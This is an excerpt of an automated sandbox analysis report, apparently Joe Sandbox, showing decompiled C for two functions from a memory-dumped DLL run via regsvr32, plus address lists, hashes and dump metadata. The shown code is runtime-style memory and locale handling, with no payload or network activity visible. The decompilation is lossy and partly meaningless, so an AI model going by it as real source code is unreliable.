				_t173 =  *(_t234 - 1) & 0x000000ff;
				goto 0x8003a789;
				 *((char*)(_t173 + _t284)) = 0x20;
				if (_t173 + _t178 - ( *_t234 & 0x000000ff) <= 0) goto 0x8003a77f;
				if ( *((intOrPtr*)( &(_t234[2]) - 1)) != 0) goto 0x8003a775;
				_t42 = _t290 + 0x100; // 0x100
				_t236 = _t42;
				 *((intOrPtr*)(_t272 + 0x30)) = 0;
				r9d = 0x100;
				 *((intOrPtr*)(_t272 + 0x28)) =  *_t281;
				 *((long long*)(_t272 + 0x60)) = _t236;
				 *((long long*)(_t272 + 0x20)) = _t236;
				if (E00000001180038E5C(_t178,  *((intOrPtr*)( &(_t234[2]) - 1)), _t225, _t236, __rcx, _t266, _t284) == 0) goto 0x8003aa8a;
				r12d =  *(_t272 + 0x50);
				_t48 = _t290 + 0xfe; // 0xfe
				_t213 = _t48;
				 *_t213 = 0;
				 *((char*)(_t287 + 0x7f)) = 0;
				 *((char*)(_t269 + 0x7f)) = 0;
				 *((char*)(_t287 + 0x80)) = 0;
				 *((char*)(_t269 + 0x80)) = 0;
				 *((long long*)(_t272 + 0x68)) = _t213;
				if (r12d - _t178 <= 0) goto 0x8003a83c;
				if ( *((intOrPtr*)(_t272 + 0x86)) == 0) goto 0x8003a83c;
				_t237 = _t272 + 0x87;
				if ( *_t237 == 0) goto 0x8003a83c;
				_t176 =  *(_t237 - 1) & 0x000000ff;
				goto 0x8003a82c;
				_t214 = _t176;
				r8d = 0x8000;
				 *((intOrPtr*)(_t290 + 0x100 + _t214 * 2)) = r8w;
				if (_t176 + _t178 - ( *_t237 & 0x000000ff) <= 0) goto 0x8003a818;
				if ( *((intOrPtr*)( &(_t237[2]) - 1)) != 0) goto 0x8003a80e;
				_t61 = _t290 + 0x200; // 0x200
				asm("movups xmm0, [ecx]");
				asm("movups xmm1, [ecx+0x10]");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x20]");
				asm("movups xmm1, [ecx+0x30]");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x40]");
				asm("movups xmm1, [ecx+0x50]");
				asm("inc ecx");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x60]");
				asm("inc ecx");
				_t291 = _t290 + _t214;
				asm("movups xmm0, [ecx+0x70]");
				_t240 = _t61 + _t214;
				asm("inc ecx");
				asm("movups xmm1, [ecx]");
				_t215 =  *((intOrPtr*)(_t240 + 0x70));
				asm("movups xmm0, [ecx+0x10]");
				asm("inc ecx");
				asm("movups xmm1, [ecx+0x20]");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x30]");
				asm("inc ecx");
				asm("movups xmm1, [ecx+0x40]");
				asm("inc ecx");
				asm("movups xmm0, [ecx+0x50]");
				asm("inc ecx");
				asm("movups xmm1, [ecx+0x60]");
				asm("inc ecx");
				asm("inc ecx");
				 *((long long*)(_t291 + 0x70)) =  *((intOrPtr*)(_t240 + 0x70));
				 *((intOrPtr*)(_t291 + 0x78)) =  *((intOrPtr*)(_t240 + 0x78));
				 *((short*)(_t291 + 0x7c)) =  *(_t240 + 0x7c) & 0x0000ffff;
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("repne inc ecx");
				asm("inc ecx");
				asm("repne inc ecx");
				 *((intOrPtr*)(_t287 + 0x78)) =  *((intOrPtr*)(_t287 + 0x178));
				 *((short*)(_t287 + 0x7c)) =  *(_t287 + 0x17c) & 0x0000ffff;
				 *((char*)(_t287 + 0x7e)) =  *((intOrPtr*)(_t287 + 0x17e));
				asm("movups xmm0, [ebp+0x100]");
				asm("movups xmm1, [ebp+0x110]");
				asm("movups [ebp], xmm0");
				asm("movups xmm0, [ebp+0x120]");
				asm("movups [ebp+0x10], xmm1");
				asm("movups xmm1, [ebp+0x130]");
				asm("movups [ebp+0x20], xmm0");
				asm("movups xmm0, [ebp+0x140]");
				asm("movups [ebp+0x30], xmm1");
				asm("movups xmm1, [ebp+0x150]");
				asm("movups [ebp+0x40], xmm0");
				asm("movups xmm0, [ebp+0x160]");
				asm("movups [ebp+0x50], xmm1");
				asm("movsd xmm1, [ebp+0x170]");
				asm("movups [ebp+0x60], xmm0");
				asm("movsd [ebp+0x70], xmm1");
				 *((intOrPtr*)(_t269 + 0x78)) =  *((intOrPtr*)(_t269 + 0x178));
				 *((short*)(_t269 + 0x7c)) =  *(_t269 + 0x17c) & 0x0000ffff;
				_t140 =  *((intOrPtr*)(_t269 + 0x17e));
				 *(_t269 + 0x7e) = _t140;
				if ( *((intOrPtr*)(__rcx + 0x100)) == 0) goto 0x8003aa46;
				asm("lock xadd [ecx], eax");
				if ((_t140 | 0xffffffff) != _t178) goto 0x8003aa46;
				E0000000118002E8A0( *((intOrPtr*)(_t240 + 0x70)),  *((intOrPtr*)(__rcx + 0x108)) - 0xfe);
				r15d = 0x80;
				E0000000118002E8A0( *((intOrPtr*)(_t240 + 0x70)),  *((intOrPtr*)(__rcx + 0x110)) - _t291);
				E0000000118002E8A0( *((intOrPtr*)(_t240 + 0x70)),  *((intOrPtr*)(__rcx + 0x118)) - _t291);
				E0000000118002E8A0(_t215,  *((intOrPtr*)(__rcx + 0x100)));
				_t216 =  *(_t272 + 0x58);
				 *_t216 = _t178;
				 *((long long*)(__rcx + 0x100)) = _t216;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(_t272 + 0x60));
				 *((long long*)(__rcx + 0x108)) =  *((intOrPtr*)(_t272 + 0x68));
				_t90 = _t287 + 0x80; // 0x80
				 *((long long*)(__rcx + 0x110)) = _t90;
				_t92 = _t269 + 0x80; // 0x80
				_t220 = _t92;
				 *((long long*)(__rcx + 0x118)) = _t92;
				 *(__rcx + 8) = r12d;
				goto 0x8003aaae;
				E0000000118002E8A0(_t92,  *(_t272 + 0x58));
				E0000000118002E8A0(_t92, _t291);
				E0000000118002E8A0(_t92, _t287);
				E0000000118002E8A0(_t220, _t269);
				_t253 = _t284;
				E0000000118002E8A0(_t220, _t253);
				goto 0x8003ab07;
				if ( *((intOrPtr*)(_t253 + 0x100)) == 0) goto 0x8003aac9;
				asm("lock dec dword [eax]");
				 *((long long*)(_t253 + 0x100)) = _t225;
				 *_t253 = 0x8004cfd0;
				 *((long long*)(_t253 + 0x108)) = _t225;
				 *((long long*)(_t253 + 0x110)) = 0x8004d250;
				 *((long long*)(_t253 + 0x118)) = 0x8004d3d0;
				 *((intOrPtr*)(_t253 + 8)) = 1;
				return E000000011800010E0(0, 0,  *(_t272 + 0x98) ^ _t272);
			}
































                                                                                                    0x18003a564
                                                                                                    0x18003a564
                                                                                                    0x18003a564
                                                                                                    0x18003a564
                                                                                                    0x18003a567
                                                                                                    0x18003a56b
                                                                                                    0x18003a56f
                                                                                                    0x18003a57c
                                                                                                    0x18003a583
                                                                                                    0x18003a58a
                                                                                                    0x18003a58d
                                                                                                    0x18003a59e
                                                                                                    0x18003a5a5
                                                                                                    0x18003a5a9
                                                                                                    0x18003a5ac
                                                                                                    0x18003a5b1
                                                                                                    0x18003a5b7
                                                                                                    0x18003a5bd
                                                                                                    0x18003a5c1
                                                                                                    0x18003a5c6
                                                                                                    0x18003a5c6
                                                                                                    0x18003a5cd
                                                                                                    0x18003a5d1
                                                                                                    0x18003a5d6
                                                                                                    0x18003a5e7
                                                                                                    0x18003a5f2
                                                                                                    0x18003a5f5
                                                                                                    0x18003a5fc
                                                                                                    0x18003a612
                                                                                                    0x18003a619
                                                                                                    0x18003a626
                                                                                                    0x18003a62d
                                                                                                    0x18003a63a
                                                                                                    0x18003a641
                                                                                                    0x18003a651
                                                                                                    0x18003a658
                                                                                                    0x18003a65b
                                                                                                    0x18003a665
                                                                                                    0x18003a66e
                                                                                                    0x18003a677
                                                                                                    0x18003a680
                                                                                                    0x18003a689
                                                                                                    0x18003a694
                                                                                                    0x18003a6a0
                                                                                                    0x18003a6b6
                                                                                                    0x18003a6c4
                                                                                                    0x18003a6d2
                                                                                                    0x18003a6e0
                                                                                                    0x18003a6e4
                                                                                                    0x18003a6e8
                                                                                                    0x18003a6f0
                                                                                                    0x18003a6f9
                                                                                                    0x18003a6fd
                                                                                                    0x18003a704
                                                                                                    0x18003a708
                                                                                                    0x18003a708
                                                                                                    0x18003a713
                                                                                                    0x18003a71d
                                                                                                    0x18003a72b
                                                                                                    0x18003a72f
                                                                                                    0x18003a733
                                                                                                    0x18003a739
                                                                                                    0x18003a742
                                                                                                    0x18003a746
                                                                                                    0x18003a74d
                                                                                                    0x18003a758
                                                                                                    0x18003a762
                                                                                                    0x18003a76b
                                                                                                    0x18003a76d
                                                                                                    0x18003a777
                                                                                                    0x18003a779
                                                                                                    0x18003a77d
                                                                                                    0x18003a784
                                                                                                    0x18003a78e
                                                                                                    0x18003a797
                                                                                                    0x18003a79d
                                                                                                    0x18003a79d
                                                                                                    0x18003a7a4
                                                                                                    0x18003a7a8
                                                                                                    0x18003a7ae
                                                                                                    0x18003a7b5
                                                                                                    0x18003a7bc
                                                                                                    0x18003a7ca
                                                                                                    0x18003a7d0
                                                                                                    0x18003a7d5
                                                                                                    0x18003a7d5
                                                                                                    0x18003a7dc
                                                                                                    0x18003a7df
                                                                                                    0x18003a7e3
                                                                                                    0x18003a7e6
                                                                                                    0x18003a7ed
                                                                                                    0x18003a7f3
                                                                                                    0x18003a7fb
                                                                                                    0x18003a804
                                                                                                    0x18003a806
                                                                                                    0x18003a810
                                                                                                    0x18003a812
                                                                                                    0x18003a816
                                                                                                    0x18003a818
                                                                                                    0x18003a81b
                                                                                                    0x18003a823
                                                                                                    0x18003a831
                                                                                                    0x18003a83a
                                                                                                    0x18003a83c
                                                                                                    0x18003a848
                                                                                                    0x18003a84b
                                                                                                    0x18003a84f
                                                                                                    0x18003a853
                                                                                                    0x18003a858
                                                                                                    0x18003a85c
                                                                                                    0x18003a860
                                                                                                    0x18003a865
                                                                                                    0x18003a86a
                                                                                                    0x18003a86e
                                                                                                    0x18003a872
                                                                                                    0x18003a877
                                                                                                    0x18003a87c
                                                                                                    0x18003a880
                                                                                                    0x18003a885
                                                                                                    0x18003a888
                                                                                                    0x18003a88c
                                                                                                    0x18003a88f
                                                                                                    0x18003a894
                                                                                                    0x18003a897
                                                                                                    0x18003a89b
                                                                                                    0x18003a89f
                                                                                                    0x18003a8a3
                                                                                                    0x18003a8a7
                                                                                                    0x18003a8ac
                                                                                                    0x18003a8b0
                                                                                                    0x18003a8b5
                                                                                                    0x18003a8b9
                                                                                                    0x18003a8be
                                                                                                    0x18003a8c2
                                                                                                    0x18003a8c7
                                                                                                    0x18003a8cb
                                                                                                    0x18003a8d0
                                                                                                    0x18003a8d5
                                                                                                    0x18003a8dc
                                                                                                    0x18003a8e4
                                                                                                    0x18003a8f0
                                                                                                    0x18003a8f8
                                                                                                    0x18003a900
                                                                                                    0x18003a904
                                                                                                    0x18003a90c
                                                                                                    0x18003a911
                                                                                                    0x18003a919
                                                                                                    0x18003a91e
                                                                                                    0x18003a926
                                                                                                    0x18003a92b
                                                                                                    0x18003a933
                                                                                                    0x18003a938
                                                                                                    0x18003a940
                                                                                                    0x18003a945
                                                                                                    0x18003a94e
                                                                                                    0x18003a953
                                                                                                    0x18003a959
                                                                                                    0x18003a965
                                                                                                    0x18003a971
                                                                                                    0x18003a975
                                                                                                    0x18003a982
                                                                                                    0x18003a989
                                                                                                    0x18003a98d
                                                                                                    0x18003a994
                                                                                                    0x18003a998
                                                                                                    0x18003a99f
                                                                                                    0x18003a9a3
                                                                                                    0x18003a9aa
                                                                                                    0x18003a9ae
                                                                                                    0x18003a9b5
                                                                                                    0x18003a9b9
                                                                                                    0x18003a9c0
                                                                                                    0x18003a9c4
                                                                                                    0x18003a9cc
                                                                                                    0x18003a9d0
                                                                                                    0x18003a9d5
                                                                                                    0x18003a9df
                                                                                                    0x18003a9e3
                                                                                                    0x18003a9e9
                                                                                                    0x18003a9f6
                                                                                                    0x18003a9fb
                                                                                                    0x18003aa01
                                                                                                    0x18003aa11
                                                                                                    0x18003aa1d
                                                                                                    0x18003aa26
                                                                                                    0x18003aa35
                                                                                                    0x18003aa41
                                                                                                    0x18003aa46
                                                                                                    0x18003aa4b
                                                                                                    0x18003aa4d
                                                                                                    0x18003aa59
                                                                                                    0x18003aa61
                                                                                                    0x18003aa68
                                                                                                    0x18003aa6f
                                                                                                    0x18003aa76
                                                                                                    0x18003aa76
                                                                                                    0x18003aa7d
                                                                                                    0x18003aa84
                                                                                                    0x18003aa88
                                                                                                    0x18003aa8f
                                                                                                    0x18003aa97
                                                                                                    0x18003aa9f
                                                                                                    0x18003aaa7
                                                                                                    0x18003aaae
                                                                                                    0x18003aab1
                                                                                                    0x18003aab8
                                                                                                    0x18003aac4
                                                                                                    0x18003aac6
                                                                                                    0x18003aad0
                                                                                                    0x18003aad7
                                                                                                    0x18003aae6
                                                                                                    0x18003aaed
                                                                                                    0x18003aafb
                                                                                                    0x18003ab04
                                                                                                    0x18003ab37

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapInfoLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1648928578-0
                                                                                                    • Opcode ID: 3c4228af0b3175a90181291df6354c510d5683a7db2dc8ab0699f9f612b91078
                                                                                                    • Instruction ID: 9ed3f7951994b30abc987cc402b73e6fb674eeb387ff634935c33afe1f166b84
                                                                                                    • Opcode Fuzzy Hash: 3c4228af0b3175a90181291df6354c510d5683a7db2dc8ab0699f9f612b91078
                                                                                                    • Instruction Fuzzy Hash: C2026E33A18BC486E792CF2899453E977A4F75D788F46D225EF8C86652EF34D289C700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018003ED8C Relevance: 1.8, APIs: 1, Instructions: 338COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E0000000118003ED8C(intOrPtr* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v40;
				long long _v48;
				char _v56;
				long long _v72;
				void* _t112;
				void* _t118;
				signed int _t150;
				char _t182;
				long long _t213;
				intOrPtr* _t224;
				long long _t285;
				char* _t297;
				signed int* _t298;
				signed int* _t330;
				void* _t332;
				long long _t334;
				void* _t335;
				intOrPtr* _t336;
				long long _t338;
				long long _t339;

				_t332 = __r9;
				_t224 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_v56 = __rcx;
				r15d = 0;
				_v48 = __rbx;
				if ( *((intOrPtr*)(__rcx + 0x140)) != __rbx) goto 0x8003eddc;
				if ( *((intOrPtr*)(__rcx + 0x148)) != __rbx) goto 0x8003eddc;
				r12d = 0;
				goto 0x8003f250;
				r13d = 1;
				E0000000118002E7AC(_t112, __rcx, __rdx);
				_t338 = _t224;
				E0000000118002E8A0(_t224, __rcx);
				if (_t338 != 0) goto 0x8003ee06;
				goto 0x8003f2a6;
				E0000000118002E7AC(r13d, _t335, __rdx);
				_t334 = _t224;
				E0000000118002E8A0(_t224, _t335);
				if (_t334 != 0) goto 0x8003ee2e;
				_t118 = E0000000118002E8A0(_t224, _t338);
				goto 0x8003edfe;
				if ( *((intOrPtr*)(__rcx + 0x140)) == __rbx) goto 0x8003f18d;
				E0000000118002E7AC(_t118, _t335, __rdi);
				_t339 = _t224;
				E0000000118002E8A0(_t224, _t335);
				_t213 = _t339;
				if (_t213 != 0) goto 0x8003ee62;
				E0000000118002E8A0(_t224, _t338);
				goto 0x8003ee27;
				_t300 =  *((intOrPtr*)(__rcx + 0x140));
				_t10 = _t338 + 0x18; // 0x18
				_v72 = _t10;
				r9d = 0x15;
				_t12 =  &_v56; // -15
				E00000001180042C2C(0, r13d, _t12,  *((intOrPtr*)(__rcx + 0x140)));
				_t13 = _t338 + 0x20; // 0x20
				r9d = 0x14;
				_v72 = _t13;
				_t15 =  &_v56; // -15
				E00000001180042C2C(0, r13d, _t15,  *((intOrPtr*)(__rcx + 0x140)));
				_t16 = _t338 + 0x28; // 0x28
				r9d = 0x16;
				_v72 = _t16;
				_t18 =  &_v56; // -15
				E00000001180042C2C(0, r13d, _t18,  *((intOrPtr*)(__rcx + 0x140)));
				_t19 =  &_v56; // -15
				_t20 = _t338 + 0x30; // 0x30
				r9d = 0x17;
				_v72 = _t20;
				E00000001180042C2C(0, r13d, _t19,  *((intOrPtr*)(__rcx + 0x140)));
				r9d = 0x18;
				_t22 = _t338 + 0x38; // 0x38
				_t336 = _t22;
				_v72 = _t336;
				_t24 =  &_v56; // -15
				E00000001180042C2C(0, _t332 - 0x17, _t24, _t300);
				r9d = 0x50;
				_t26 =  &_v56; // -15
				_t27 = _t338 + 0x40; // 0x40
				_v72 = _t27;
				E00000001180042C2C(0, _t332 - 0x4f, _t26, _t300);
				r9d = 0x51;
				_t30 =  &_v56; // -15
				_t31 = _t338 + 0x48; // 0x48
				_v72 = _t31;
				E00000001180042C2C(0, _t332 - 0x50, _t30, _t300);
				_t34 =  &_v56; // -15
				_t35 = _t338 + 0x50; // 0x50
				r9d = 0x1a;
				_v72 = _t35;
				E00000001180042C2C(0, 0, _t34, _t300);
				_t37 =  &_v56; // -15
				_t38 = _t338 + 0x51; // 0x51
				r9d = 0x19;
				_v72 = _t38;
				E00000001180042C2C(0, 0, _t37, _t300);
				_t40 =  &_v56; // -15
				_t41 = _t338 + 0x52; // 0x52
				r9d = 0x54;
				_v72 = _t41;
				E00000001180042C2C(0, 0, _t40, _t300);
				_t43 = _t338 + 0x53; // 0x53
				r9d = 0x55;
				_v72 = _t43;
				_t45 =  &_v56; // -15
				E00000001180042C2C(0, 0, _t45, _t300);
				_t46 =  &_v56; // -15
				_t47 = _t338 + 0x54; // 0x54
				r9d = 0x56;
				_v72 = _t47;
				E00000001180042C2C(0, 0, _t46, _t300);
				_t49 =  &_v56; // -15
				_t50 = _t338 + 0x55; // 0x55
				r9d = 0x57;
				_v72 = _t50;
				E00000001180042C2C(0, 0, _t49, _t300);
				_t52 =  &_v56; // -15
				_t53 = _t338 + 0x56; // 0x56
				r9d = 0x52;
				_v72 = _t53;
				E00000001180042C2C(0, 0, _t52, _t300);
				_t55 =  &_v56; // -15
				_t56 = _t338 + 0x57; // 0x57
				r9d = 0x53;
				_v72 = _t56;
				E00000001180042C2C(0, 0, _t55, _t300);
				r9d = 0x15;
				_t58 =  &_v56; // -15
				_t59 = _t338 + 0x68; // 0x68
				_v72 = _t59;
				E00000001180042C2C(0, _t332 - 0x13, _t58, _t300);
				r9d = 0x14;
				_t62 =  &_v56; // -15
				_t63 = _t338 + 0x70; // 0x70
				_v72 = _t63;
				E00000001180042C2C(0, _t332 - 0x12, _t62, _t300);
				r9d = 0x16;
				_t66 =  &_v56; // -15
				_t67 = _t338 + 0x78; // 0x78
				_v72 = _t67;
				E00000001180042C2C(0, _t332 - 0x14, _t66, _t300);
				r9d = 0x17;
				_t70 =  &_v56; // -15
				_t71 = _t338 + 0x80; // 0x80
				_v72 = _t71;
				E00000001180042C2C(0, _t332 - 0x15, _t70, _t300);
				r9d = 0x50;
				_t74 =  &_v56; // -15
				_t75 = _t338 + 0x88; // 0x88
				_v72 = _t75;
				E00000001180042C2C(0, _t332 - 0x4e, _t74, _t300);
				_t78 = _t338 + 0x90; // 0x90
				r9d = 0x51;
				_v72 = _t78;
				_t80 =  &_v56; // -15
				E00000001180042C2C(0, _t332 - 0x4f, _t80, _t300);
				if (_t213 == 0) goto 0x8003f13f;
				E0000000118003EC80(_t338);
				E0000000118002E8A0(_t78, _t338);
				E0000000118002E8A0(_t78, _t334);
				_t285 = _t339;
				E0000000118002E8A0(_t78, _t285);
				goto 0x8003f2a6;
				_t297 =  *_t336;
				if ( *_t297 == 0) goto 0x8003f1f5;
				if (_t285 - 0x30 - 9 > 0) goto 0x8003f16d;
				_t182 =  *_t297 - 0x30;
				 *_t297 = _t182;
				r13d = 1;
				_t298 = _t297 + _t336;
				if ( *_t298 != 0) goto 0x8003f14d;
				goto 0x8003f1fb;
				if (_t182 != 0x3b) goto 0x8003f15b;
				_t330 = _t298;
				_t150 = _t330[0];
				 *_t330 = _t150;
				if (_t150 != 0) goto 0x8003f175;
				r13d = 1;
				goto 0x8003f164;
				asm("movups xmm0, [eax]");
				asm("inc ecx");
				asm("movups xmm1, [eax+0x10]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x20]");
				asm("inc ecx");
				asm("movups xmm1, [eax+0x30]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x40]");
				asm("inc ecx");
				asm("movups xmm1, [eax+0x50]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x60]");
				asm("inc ecx");
				asm("movups xmm0, [eax+0x70]");
				asm("inc ecx");
				asm("movups xmm1, [eax+edx]");
				asm("inc ecx");
				 *((long long*)(_t338 +  &(_t298[4]))) =  *((intOrPtr*)(0x8005d890 +  &(_t298[4])));
				goto 0x8003f1fb;
				r13d = 1;
				 *_t338 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8))));
				 *((long long*)(_t338 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 8));
				 *((long long*)(_t338 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x10));
				 *((long long*)(_t338 + 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x58));
				 *((long long*)(_t338 + 0x60)) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0xf8)) + 0x60));
				 *_t334 = r13d;
				if (_t339 == 0) goto 0x8003f250;
				 *_t339 = r13d;
				if ( *((intOrPtr*)(__rcx + 0xf0)) == 0) goto 0x8003f25f;
				asm("lock dec dword [eax]");
				if ( *((intOrPtr*)(__rcx + 0xe0)) == 0) goto 0x8003f28f;
				asm("lock xadd [ecx], eax");
				if ((_t150 | 0xffffffff) != 1) goto 0x8003f28f;
				E0000000118002E8A0( *((intOrPtr*)(__rcx + 0xf0)),  *((intOrPtr*)(__rcx + 0xf8)));
				E0000000118002E8A0( *((intOrPtr*)(__rcx + 0xf0)),  *((intOrPtr*)(__rcx + 0xe0)));
				 *((long long*)(__rcx + 0xf0)) = _t339;
				 *((long long*)(__rcx + 0xe0)) = _t334;
				 *((long long*)(__rcx + 0xf8)) = _t338;
				return 0;
			}























                                                                                                    0x18003ed8c
                                                                                                    0x18003ed8c
                                                                                                    0x18003ed8c
                                                                                                    0x18003ed91
                                                                                                    0x18003ed96
                                                                                                    0x18003edad
                                                                                                    0x18003edb4
                                                                                                    0x18003edb7
                                                                                                    0x18003edc2
                                                                                                    0x18003edcb
                                                                                                    0x18003edcd
                                                                                                    0x18003edd7
                                                                                                    0x18003eddc
                                                                                                    0x18003edea
                                                                                                    0x18003edf1
                                                                                                    0x18003edf4
                                                                                                    0x18003edfc
                                                                                                    0x18003ee01
                                                                                                    0x18003ee10
                                                                                                    0x18003ee17
                                                                                                    0x18003ee1a
                                                                                                    0x18003ee22
                                                                                                    0x18003ee27
                                                                                                    0x18003ee2c
                                                                                                    0x18003ee35
                                                                                                    0x18003ee41
                                                                                                    0x18003ee48
                                                                                                    0x18003ee4b
                                                                                                    0x18003ee50
                                                                                                    0x18003ee53
                                                                                                    0x18003ee58
                                                                                                    0x18003ee60
                                                                                                    0x18003ee62
                                                                                                    0x18003ee69
                                                                                                    0x18003ee70
                                                                                                    0x18003ee75
                                                                                                    0x18003ee7b
                                                                                                    0x18003ee82
                                                                                                    0x18003ee87
                                                                                                    0x18003ee8b
                                                                                                    0x18003ee91
                                                                                                    0x18003ee99
                                                                                                    0x18003eea2
                                                                                                    0x18003eea7
                                                                                                    0x18003eeab
                                                                                                    0x18003eeb1
                                                                                                    0x18003eeb9
                                                                                                    0x18003eec2
                                                                                                    0x18003eec9
                                                                                                    0x18003eecd
                                                                                                    0x18003eed1
                                                                                                    0x18003eeda
                                                                                                    0x18003eee2
                                                                                                    0x18003eee7
                                                                                                    0x18003eeed
                                                                                                    0x18003eeed
                                                                                                    0x18003eef4
                                                                                                    0x18003eef9
                                                                                                    0x18003ef03
                                                                                                    0x18003ef08
                                                                                                    0x18003ef0e
                                                                                                    0x18003ef17
                                                                                                    0x18003ef1b
                                                                                                    0x18003ef24
                                                                                                    0x18003ef29
                                                                                                    0x18003ef2f
                                                                                                    0x18003ef38
                                                                                                    0x18003ef3c
                                                                                                    0x18003ef45
                                                                                                    0x18003ef4c
                                                                                                    0x18003ef50
                                                                                                    0x18003ef54
                                                                                                    0x18003ef5d
                                                                                                    0x18003ef64
                                                                                                    0x18003ef6b
                                                                                                    0x18003ef6f
                                                                                                    0x18003ef73
                                                                                                    0x18003ef7c
                                                                                                    0x18003ef83
                                                                                                    0x18003ef8a
                                                                                                    0x18003ef8e
                                                                                                    0x18003ef92
                                                                                                    0x18003ef9b
                                                                                                    0x18003efa2
                                                                                                    0x18003efa9
                                                                                                    0x18003efad
                                                                                                    0x18003efb6
                                                                                                    0x18003efbd
                                                                                                    0x18003efc1
                                                                                                    0x18003efc8
                                                                                                    0x18003efcc
                                                                                                    0x18003efd0
                                                                                                    0x18003efd9
                                                                                                    0x18003efe0
                                                                                                    0x18003efe7
                                                                                                    0x18003efeb
                                                                                                    0x18003efef
                                                                                                    0x18003eff8
                                                                                                    0x18003efff
                                                                                                    0x18003f006
                                                                                                    0x18003f00a
                                                                                                    0x18003f00e
                                                                                                    0x18003f017
                                                                                                    0x18003f01e
                                                                                                    0x18003f025
                                                                                                    0x18003f029
                                                                                                    0x18003f02d
                                                                                                    0x18003f036
                                                                                                    0x18003f03d
                                                                                                    0x18003f042
                                                                                                    0x18003f048
                                                                                                    0x18003f051
                                                                                                    0x18003f055
                                                                                                    0x18003f05e
                                                                                                    0x18003f063
                                                                                                    0x18003f069
                                                                                                    0x18003f072
                                                                                                    0x18003f076
                                                                                                    0x18003f07f
                                                                                                    0x18003f084
                                                                                                    0x18003f08a
                                                                                                    0x18003f093
                                                                                                    0x18003f097
                                                                                                    0x18003f0a0
                                                                                                    0x18003f0a5
                                                                                                    0x18003f0ab
                                                                                                    0x18003f0b4
                                                                                                    0x18003f0bb
                                                                                                    0x18003f0c4
                                                                                                    0x18003f0c9
                                                                                                    0x18003f0cf
                                                                                                    0x18003f0d8
                                                                                                    0x18003f0df
                                                                                                    0x18003f0e8
                                                                                                    0x18003f0ef
                                                                                                    0x18003f0f6
                                                                                                    0x18003f0fc
                                                                                                    0x18003f104
                                                                                                    0x18003f10c
                                                                                                    0x18003f113
                                                                                                    0x18003f118
                                                                                                    0x18003f120
                                                                                                    0x18003f128
                                                                                                    0x18003f12d
                                                                                                    0x18003f130
                                                                                                    0x18003f13a
                                                                                                    0x18003f13f
                                                                                                    0x18003f147
                                                                                                    0x18003f154
                                                                                                    0x18003f156
                                                                                                    0x18003f159
                                                                                                    0x18003f15b
                                                                                                    0x18003f161
                                                                                                    0x18003f166
                                                                                                    0x18003f168
                                                                                                    0x18003f170
                                                                                                    0x18003f172
                                                                                                    0x18003f179
                                                                                                    0x18003f17b
                                                                                                    0x18003f183
                                                                                                    0x18003f185
                                                                                                    0x18003f18b
                                                                                                    0x18003f199
                                                                                                    0x18003f19c
                                                                                                    0x18003f1a0
                                                                                                    0x18003f1a4
                                                                                                    0x18003f1a9
                                                                                                    0x18003f1ad
                                                                                                    0x18003f1b2
                                                                                                    0x18003f1b6
                                                                                                    0x18003f1bb
                                                                                                    0x18003f1bf
                                                                                                    0x18003f1c4
                                                                                                    0x18003f1c8
                                                                                                    0x18003f1cd
                                                                                                    0x18003f1d1
                                                                                                    0x18003f1d6
                                                                                                    0x18003f1da
                                                                                                    0x18003f1e0
                                                                                                    0x18003f1e4
                                                                                                    0x18003f1ee
                                                                                                    0x18003f1f3
                                                                                                    0x18003f1f5
                                                                                                    0x18003f205
                                                                                                    0x18003f213
                                                                                                    0x18003f222
                                                                                                    0x18003f231
                                                                                                    0x18003f240
                                                                                                    0x18003f244
                                                                                                    0x18003f24b
                                                                                                    0x18003f24d
                                                                                                    0x18003f25a
                                                                                                    0x18003f25c
                                                                                                    0x18003f269
                                                                                                    0x18003f26e
                                                                                                    0x18003f275
                                                                                                    0x18003f27e
                                                                                                    0x18003f28a
                                                                                                    0x18003f28f
                                                                                                    0x18003f298
                                                                                                    0x18003f29f
                                                                                                    0x18003f2c3

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
